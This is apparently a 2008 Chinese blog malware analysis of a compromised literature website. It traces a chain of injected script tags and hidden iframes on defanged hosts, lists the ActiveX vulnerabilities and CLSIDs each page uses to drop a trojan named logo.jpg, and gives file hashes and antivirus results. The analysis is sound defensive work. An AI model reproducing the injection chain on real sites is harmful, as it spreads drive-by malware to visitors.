首页 > 其他分享 >某文学网站挂马logo.jpg/logo.exe

某文学网站挂马logo.jpg/logo.exe

时间:2022-11-22 17:05:47浏览次数:58  
标签:ip exe 挂马 com ww file shi logo hxxp


某文学网站挂马logo.jpg/logo.exe

endurer 原创
2008-04-30 第1

该网站网页包含代码:
/---
<script src="hxxp://www.ol***d*rain.com/ads/iw_t.js"></scipt>
---/

#1 hxxp://www.ol***d*rain.com/ads/iw_t.js 包含代码:
/---
<script src='/images/jin.gif'></script>
---/

#1.1 hxxp://www.ol***d*rain.com/images/jin.gif包含JavaScript代码,其功能为检查cookie变量my_ad,输出代码:
/---
<script language="javascript" src="hxxp://ww**.shi**t*ip.com/file/my.js"></script>
---/

#1.1.1 hxxp://ww**.shi**t*ip.com/file/my.js 输出代码:
/---
<script language='javascript' src='hxxp://ad.shi**t*ip.com/file/ad.js'></script>
---/

#1.1.1.1 hxxp://ad.shi**t*ip.com/file/ad.js 输出代码:
/---
<iframe width='0' height='0' src='hxxp://ww**.shi**t*ip.com/file/logo.htm'></iframe>
<iframe width='25' height='0' src='hxxp://ww**.shi**t*ip.com/file/xunlei.htm'></iframe>
<iframe width='0' height='0' src='hxxp://ww**.shi**t*ip.com/file/real.htm'></iframe>
<iframe width='0' height='0' src='hxxp://ww**.shi**t*ip.com/file/lz.htm'></iframe>
<iframe width='0' height='0' src='hxxp://ww**.shi**t*ip.com/file/bf.htm'></iframe>
<iframe width='0' height='0' src='hxxp://ww**.shi**t*ip.com/file/pps.htm'></iframe>
<iframe width='0' height='0' src='hxxp://ww**.shi**t*ip.com/file/sdr.htm'></iframe>
<iframe name='mycountif' width='0' height='0'></iframe>
---/

#1.1.1.1.1 hxxp://ww**.shi**t*ip.com/file/logo.htm

利用 MS06-014漏洞下载 hxxp://ww**.shi**t*ip.com/file/images/logo.jpg

文件说明符 : D:/test/logo.jpg
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2008-4-30 12:31:44
修改时间 : 2008-4-30 12:31:44
大小 : 30788 字节 30.68 KB
MD5 : 497cd95b261c35e380c33065058cc7ac
SHA1: 1B4A5CD93D8C4F347DEAA8BA55F6A50DE0BA4FAE
CRC32: 3e7aaf5e


文件 497cd95b261c35e380c33065058cc7ac- 接收于 2008.04.30 07:38:54 (CET)


反病毒引擎

版本

最后更新

扫描结果

AhnLab-V3

2008.4.30.0

2008.04.29

-

AntiVir

7.8.0.10

2008.04.29

TR/Dropper.Gen

Authentium

4.93.8

2008.04.27

-

Avast

4.8.1169.0

2008.04.29

-

AVG

7.5.0.516

2008.04.30

Clicker.NBD

BitDefender

7.2

2008.04.30

-

CAT-QuickHeal

9.50

2008.04.29

(Suspicious) - DNAScan

ClamAV

0.92.1

2008.04.30

PUA.Packed.UPack-2

DrWeb

4.44.0.09170

2008.04.29

-

eSafe

7.0.15.0

2008.04.28

-

eTrust-Vet

31.3.5746

2008.04.30

-

Ewido

4.0

2008.04.29

-

F-Prot

4.4.2.54

2008.04.30

-

F-Secure

6.70.13260.0

2008.04.30

-

Fortinet

3.14.0.0

2008.04.29

-

Ikarus

T3.1.1.26

2008.04.30

Trojan-Dropper

Kaspersky

7.0.0.125

2008.04.30

-

McAfee

5284

2008.04.29

New Malware.aj

Microsoft

None

2008.04.22

-

NOD32v2

3064

2008.04.29

Win32/TrojanClicker.Agent.NCS

Norman

5.80.02

2008.04.29

-

Panda

9.0.0.4

2008.04.30

Suspicious file

Prevx1

V2

2008.04.30

-

Sophos

4.28.0

2008.04.30

Mal/Packer

Sunbelt

3.0.1056.0

2008.04.17

VIPRE.Suspicious

Symantec

10

2008.04.30

-

TheHacker

6.2.92.297

2008.04.29

W32/Behav-Heuristic-060

VBA32

3.12.6.5

2008.04.29

-

VirusBuster

4.3.26:9

2008.04.29

Packed/Upack

Webwasher-Gateway

6.6.2

2008.04.30

Trojan.Dropper.Gen


附加信息

File size: 30499 bytes

MD5...: f72b708b004a1ccfde0b3e10bced6cda

SHA1..: 439bac0bf2b84d09be5abce588b65bbb3cac55e9

SHA256: 60c6c4caa211c6fec6b011ba7d1574ce139854cb0fee5ca3591f3379f06e09c1

SHA512: a050cf1e7e7874a6f3df0b974964e7d5d2137c38423c872f739c77665433faac<BR>5ba51cc952a860642d241115ff8a314d09e3c9659ab9d7c694464c4323a32d0a

PEiD..: -

PEInfo: -

packers: UPack

packers: PE_Patch, UPack

#1.1.1.1.2 hxxp://ww**.shi**t*ip.com/file/xunlei.htm

利用迅雷(PPlayer.XPPlayer.1,clsid:F3E70CEA-956E-49CC-B444-73AFE593AD7F)漏洞下载hxxp://ww**.shi**t*ip.com/file/images/logo.jpg

#1.1.1.1.3 hxxp://ww**.shi**t*ip.com/file/real.htm

利用RealPlayer(IERPCtl.IERPCtl.1)漏洞下载hxxp://ww**.shi**t*ip.com/file/images/logo.jpg

#1.1.1.1.4 hxxp://ww**.shi**t*ip.com/file/lz.htm

利用联众(GLCHAT.GLChatCtrl.1,clsid:AE93C5DF-A990-11D1-AEBD-5254ABDD2B69)漏洞下载hxxp://ww**.shi**t*ip.com/file/images/logo.jpg

#1.1.1.1.5 hxxp://ww**.shi**t*ip.com/file/bf.htm

利用暴风暴音(MPS.StormPlayer,clsid:6BE52E1D-E586-474f-A6E2-1A85A9B4D9FB)漏洞下载hxxp://ww**.shi**t*ip.com/file/images/logo.jpg

#1.1.1.1.6 hxxp://ww**.shi**t*ip.com/file/pps.htm

利用PPStream(POWERPLAYER.PowerPlayerCtrl.1,clsid:5EC7C511-CD0F-42E6-830C-1BD9882F3458)漏洞下载 hxxp://ww**.shi**t*ip.com/file/images/logo.jpg

hxxp://ww**.shi**t*ip.com/file/sdr.htm

利用超星阅览器(clsid:7F5E27CE-4A5C-11D3-9232-0000B48A05B2)漏洞下载hxxp://ww**.shi**t*ip.com/file/images/logo.jpg

标签:ip,exe,挂马,com,ww,file,shi,logo,hxxp
From: https://blog.51cto.com/endurer/5878232

相关文章